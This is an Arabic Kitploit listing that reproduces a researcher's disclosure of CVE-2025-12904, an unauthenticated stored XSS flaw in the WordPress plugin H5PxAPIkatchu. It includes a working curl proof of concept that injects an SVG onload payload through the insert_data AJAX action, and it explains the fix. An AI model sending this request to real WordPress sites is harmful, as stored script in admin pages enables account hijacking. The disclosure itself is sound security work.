Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SNORDIAN-s-H5PxAPIkatchu-CVE-Report — إفصاح عن CVE-2025-12904 | Kitploit
أدوات/GitHubGitHub/mooseloveti/snordian-s-h5pxapikatchu-cve-report
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmooseloveti/snordian-s-h5pxapikatchu-cve-report

SNORDIAN-s-H5PxAPIkatchu-CVE-Report

إفصاح عن CVE-2025-12904

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ 8 أشهرلم تتم المراجعة بعد

SNORDIAN's-H5PxAPIkatchu-CVE-Report

إفصاح عن CVE-2025-12904

CVE-2025-12904 - ثغرة في SNORDIAN's H5PxAPIkatchu

يكشف هذا المستودع عن ثغرة اكتُشفت في SNORDIAN's H5PxAPIkatchu <= 0.4.16، وهي إضافة WordPress طوّرها otacke.

🛠 الإصدار المتأثر

  • المنتج: SNORDIAN's H5PxAPIkatchu
  • الإصدار: v0.4.16
  • الرابط: https://wordpress.org/plugins/h5pxapikatchu/

🔒 CVE المُسند

CVE IDالنوعالمكوّنالتأثير
CVE-2025-12904برمجة نصية عبر المواقع (XSS) مخزنة بدون مصادقة عبر insert_dataclass-table-view.phpيمكن للمهاجم المُصادَق تنفيذ JS

🧾 وصف تفصيلي

CVE-2025-12904 — برمجة نصية عبر المواقع (XSS) مخزنة بدون مصادقة عبر insert_data

  • المكوّن المتأثر: صفحة إدارة h5pxapikatchu
  • ناقل الهجوم: بدون مصادقة عبر طلب POST
  • المُحفِّز: يمكن للمهاجم حقن نصوص برمجية خبيثة في واجهة الإدارة من خلال استغلال إجراء insert_data لتخزين نصوص برمجية عشوائية.
root@kitploit:~
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

※ إذا لم يكن المعرّف (id) داخل الكائن موجودًا، فسيفشل الطلب.

  • التأثير: قد يتم تنفيذ النصوص البرمجية المخزنة، مما يشكل خطرًا يتمثل في أضرار جسيمة مثل اختطاف الحسابات.

❓ سبب الثغرة

دالة insert_data() لم تكن تجري أي فحوصات للصلاحيات، مما سمح بحفظ مدخلات خبيثة بدون مصادقة. علاوةً على ذلك، كانت هذه الإدخالات تُعرض بدون ترميز (unescaped) على واجهة الإدارة.

  • تستخدم دالة insert_data() الدالة current_user_can لمنع التنفيذ غير المصرح به.
  • باستخدام esc_html($value) بدلاً من echo $value، يمكنك منع تنفيذ XSS.

كلمة أخيرة

كان إنشاء PoC صعبًا جدًا.

root@kitploit:~
--data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

أهدرت وقتًا طويلًا في إعادة إنتاج هذا الجزء. أتمنى أن أتقن استخدام أوامر curl أكثر. وبالمناسبة، هذا المكوّن الإضافي... هل كل شيء على ما يرام؟ خاصةً الاسم، أليس كذلك؟

🔍 المكتشف

الاسم: MooseLove
الدور: باحث أمني مستقل / صيّاد ثغرات
التواصل: متاح عند الطلب


📚 المراجع

  • المنتج: https://wordpress.org/plugins/h5pxapikatchu/

⚠️ الترخيص

يُقدَّم هذا التقرير الاستشاري للتوعية الأمنية العامة، وهو مجاني للمشاركة مع الإشارة إلى المصدر.

تنزيل الأداة